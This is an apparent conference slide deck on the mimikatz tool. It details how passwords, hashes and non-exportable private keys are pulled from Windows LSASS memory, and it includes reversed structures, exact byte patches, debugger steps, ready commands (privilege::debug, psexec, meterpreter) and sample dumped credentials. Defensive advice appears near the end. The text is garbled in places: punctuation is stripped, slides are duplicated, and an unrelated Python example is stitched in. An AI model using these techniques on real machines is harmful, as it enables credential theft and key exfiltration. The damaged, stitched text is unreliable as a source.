[Diagram: LsaEnumerateLogonSessions, then for each LUID: search the linked list kerberos!KerbLogonSessionList for the LUID to get the KIWI_KERBEROS_LOGON_SESSION, and call LsaUnprotectMemory on its Password: password in clear.]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

mimikatz::sekurlsa - demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz::sekurlsa::kerberos - "hu?"

Ok. It works...
But why?
Not for all logons on NT5 (can need an unlock)

From my understanding of Microsoft explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy too)

Microsoft's implementation of Kerberos is full of logical...
- For password auth
  • password hash for shared secret, but keeping the password in memory
- For full smartcard auth
  • No password on client
  • No hash on client
    - NTLM hash on client...
    - KDC sent it back as a gift
mimikatz::sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be usable
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it

Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz::sekurlsa - LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses
- RC4
- DESx

[Diagram: in lsass, lsasrv holds g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz copies them from lsass into its own lsasrv before calling LsaUnprotectMemory.]
mimikatz::sekurlsa - LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses
- 3DES
- AES

[Diagram: in lsass, lsasrv holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (KIWI_BCRYPT_KEY handles); mimikatz copies them from lsass into its own lsasrv.]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz::sekurlsa - memo

Security Packages
Package          Symbols                                 Type
tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                   LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                 lsasrv!LogonSessionListCount            ULONG

Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER/My
 - Benjamin Delpy
	Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider : Microsoft Enhanced Cryptographic Provider v1.0
	Type : AT_KEYEXCHANGE
	Exportabilité : NON   (callout: Exportable?)
	Taille clé : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz crypto patchcapi – because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi – demo time
Import, export, import as not exportable… export!
mimikatz crypto patchcapi – limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng – how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz crypto cng – how it's exported (PLAYSKOOL level)
[Diagram: the process asks CNG to export a key; the request goes by RPC to the KeyIso service inside the LSASS process (on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP), which loads the private key (DPAPI decode) and checks the Exportable flag: yes → exported key; no → NTE_NOT_SUPPORTED]
mimikatz crypto patchcng – because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON   (callout: Exportable?)
	Taille clé : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz crypto patchcng – because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz crypto patchcng – demo time
Import, export, import as not exportable… export again!
mimikatz crypto patchcng – limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz crypto patchcng – bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export work too
– Yeah, like the good old certutil

(before patch)
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(after crypto::patchcng)
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto – memo
Some commands:
mimikatz # crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz # privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto – what we can do
Exactly the same as for sekurlsa: what prevents access to accounts/computers is no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz – what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz – that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa tspkg – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl in tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
	PVOID unk0;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
	BYTE unk0[108];
#elif defined _M_IX86
	BYTE unk0[64];
#endif
	LUID LocallyUniqueIdentifier;
	PVOID unk1;
	PVOID unk2;
	PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz sekurlsa tspkg – demo time
sekurlsa::tspkg
mimikatz sekurlsa wdigest
because clear text password over http/https is not cool
mimikatz sekurlsa wdigest – what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP" Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz sekurlsa wdigest – what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[:…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
The WDigest provider must therefore keep the elements needed to compute responses for different servers:
– Username
– Realm (from the server)
– Password
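As an added example (not part of the original slides), the RFC 2617 digest computation the slide describes, carried through for a client that holds the password and a server-side store that holds only per-realm HA1 values (the "hashes for each realm" of Advanced Digest): the client can answer a realm it has never seen only because it still has the password. Usernames, realms, nonces and URIs are constructed.

```python
import hashlib
from typing import Dict, Iterable, Optional


def md5hex(data: str) -> str:
    """MD5 of a UTF-8 string as lowercase hex, the primitive Digest is built on."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): it depends on the server-supplied realm."""
    return md5hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) (the qop="auth" form)."""
    return md5hex(f"{method}:{digest_uri}")


def digest_response(h1: str, nonce: str, h2: str,
                    nc: Optional[str] = None, cnonce: Optional[str] = None,
                    qop: Optional[str] = None) -> str:
    """MD5(HA1:nonce:HA2) (RFC 2069 style) or MD5(HA1:nonce:nc:cnonce:qop:HA2) with qop."""
    if qop is None:
        return md5hex(f"{h1}:{nonce}:{h2}")
    return md5hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


class ClientWithPassword:
    """Models what the slide says the WDigest provider must keep: username and
    password. The realm is only learnt from each server's challenge, so HA1
    cannot be fixed once at logon."""

    def __init__(self, username: str, password: str) -> None:
        self.username = username
        self.password = password  # retained in clear, "by protocol"

    def respond(self, realm: str, nonce: str, method: str, uri: str) -> str:
        h1 = ha1(self.username, realm, self.password)
        return digest_response(h1, nonce, ha2(method, uri))


class PerRealmHa1Store:
    """Server-side verifier that holds MD5(username:realm:password) per realm
    and never the password (the Advanced Digest idea). It can check a response
    only for a realm whose HA1 was precomputed."""

    def __init__(self, username: str, password: str, realms: Iterable[str]) -> None:
        self.username = username
        self.table: Dict[str, str] = {r: ha1(username, r, password) for r in realms}

    def verify(self, realm: str, nonce: str, method: str, uri: str,
               response: str) -> Optional[bool]:
        h1 = self.table.get(realm)
        if h1 is None:
            return None  # unknown realm: nothing to compare against without the password
        return digest_response(h1, nonce, ha2(method, uri)) == response


# Constructed sample challenge parameters (hypothetical server values).
SAMPLE_NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
SAMPLE_METHOD = "GET"
SAMPLE_URI = "/dir/index.html"


def exchange(client: ClientWithPassword, store: PerRealmHa1Store, realm: str,
             nonce: str = SAMPLE_NONCE, method: str = SAMPLE_METHOD,
             uri: str = SAMPLE_URI):
    """One challenge/response round: returns (client response, verification result)."""
    response = client.respond(realm, nonce, method, uri)
    return response, store.verify(realm, nonce, method, uri, response)


if __name__ == "__main__":
    client = ClientWithPassword("Gentil Kiwi", "waza1234")
    store = PerRealmHa1Store("Gentil Kiwi", "waza1234", ["vm-w8-rp-x"])
    print(exchange(client, store, "vm-w8-rp-x"))   # verified
    print(exchange(client, store, "new-realm"))    # client answers, store cannot check
```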
mimikatz sekurlsa wdigest – theory
This time we know:
– that WDigest keeps the password in memory "by protocol" for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the double linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8        call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
	struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
	struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
	DWORD UsageCount;
	struct _KIWI_WDIGEST_LIST_ENTRY *This;
	LUID LocallyUniqueIdentifier;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
	[…]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz sekurlsa wdigest – demo time
sekurlsa::wdigest
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
mimikatz sekurlsa livessp – how?
Actually I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~ … be more brutal this time, set a WinDBG trap!
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz sekurlsa livessp – how?
Let's login with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
Stacks (kc 5) at the LsaProtectMemory breakpoint:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
(our LiveSSP provider)

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[…]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Yeah, Pass the Hash capability with Live accounts too…
Live users can logon through RDP via SSO.
mimikatz sekurlsa livessp – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz sekurlsa
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me, yes!
mimikatz sekurlsa kerberos
Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Stacks at the LsaProtectMemory breakpoint:
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
(Kerberos ticket part? Maybe ;))

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
(Kerberos part for the password)

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6) – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5) – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa – demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa kerberos – "hu?"
Ok, it works…
But why?
Not for all logons on NT5 (an unlock may be needed)
From my understanding of Microsoft's explanations:
– no need for passwords in the Kerberos protocol…
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on the client
  • No hash on the client
  – NTLM hash on the client…
  – the KDC sent it back as a gift
mimikatz sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to benefit from its keys when we called it.
Can it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
